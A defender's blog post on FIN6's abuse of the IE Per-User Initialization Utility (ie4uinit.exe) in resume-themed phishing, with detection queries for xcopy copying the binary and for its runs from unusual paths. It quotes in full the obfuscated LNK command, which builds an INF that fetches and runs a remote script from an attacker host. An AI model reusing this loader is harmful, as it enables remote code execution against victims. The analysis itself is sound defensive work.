165. FIN6 Abuses IE Per-User Initialization Utility
Hello everyone!
Let's look at another curious example of System Binary Proxy Execution (T1218) technique. DomainTools reported on FIN6 (Skeleton Spider) campaign, which included phishing with fake resumes.
The adversary distributed archives with malicious LNK-files. The file executed an obfuscated command, for example:
%ComSpec%" /v /c (for %l in (s) do @set "Alter=%~l") && !Alter!et "Trick=ure = " && !Alter!et "Drawings=-base" && !Alter!et "Person=version" && !Alter!et "Twist=." && !Alter!et "Involves=$win" && !Alter!et "Genius=si" && !Alter!et "Streams=d" && !Alter!et "Grass=t" && !Alter!et "Builders=c" && !Alter!et "Armor=settings" && !Alter!et "Disorder=e" && !Alter!et "Womens=ni" && !Alter!et "Cloth=a" && !Alter!et "Enjoy=a" && !Alter!et "Careers=default" && !Alter!et "Tunnel=!Twist!inf" && !Alter!et "Dishes=ieui!Womens!t!Tunnel!" && c!Cloth!ll !Alter!et "Tales=%!Enjoy!ppd!Cloth!ta%\micro!Alter!oft\" && s!Disorder!t "Bonds=!Tales!!Dishes!" && (for /D %l in ("[DFF]" "ieu%Forget%!Tunnel!" "[s!Grass!ring!Alter!]" "!Alter!hortsvcn!Enjoy!me=' '" "Clever=/" "Forget=i!Womens!t" "Popular=com" "Unhappy=%time%" "Mattress=:;Bathrooms" "Tooth=h" "Dinner=t;Characters" "!Alter!ervicen!Enjoy!me=' '" "Editors=b;Metals" "[!Streams!e!Alter!tinationdirs]" "!Careers!destdir=11" "DFF=01" "[7E102F]" "sc\" "ro%Editors%j,NI,%Tooth%%Dinner%%Dinner%p%Mattress%%Clever%%Clever%lsfyf!Twist!kimberlykamara!Twist!%Popular%/winapayf" "[!Person!]" "signat!Trick!!Involves!dows nt$" "[!Careers!in!Alter!tall.windows7]" "!Streams!elfil!Disorder!s=DFF" "Un\" "Register\" "OCXs=7E102F" ) do @echo %~l)>"!Bonds!" && !Alter!et "Coyote=ie4ui!Womens!t.!Disorder!xe" && !Builders!all x!Builders!opy /Y /C /Q %win!Streams!ir%\!Alter!ys!Grass!!Disorder!m32\!Coyote! "!Tales!*" && !Tales!!Coyote! -base!Armor!
The script writes an INF file to %AppData%\Microsoft\ieinit.inf, writes malicious content to it. It abuses xcopy to copy IE Per-User Initialization Utility (ie4uinit.exe):
xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "%APPDATA%\microsoft\*"
Finally, the script executes ie4uinit.exe to load the INF file:
"%AppData%\Microsoft\ie4init.exe" -basesettings
So, first we can detect copying IE Per-User Initialization Utility via xcopy:
event_type: "processcreatewin"
AND
proc_file_name: "xcopy.exe"
AND
cmdline: "ie4uinit.exe"
Second - IE Per-User Initialization Utility executions from uncommon locations:
event_type: "processcreatewin"
AND
proc_file_name: "ie4uinit.exe"
AND NOT
proc_file_path: ("system32" OR "syswow64")
See you tomorrow!
Comments
Post a Comment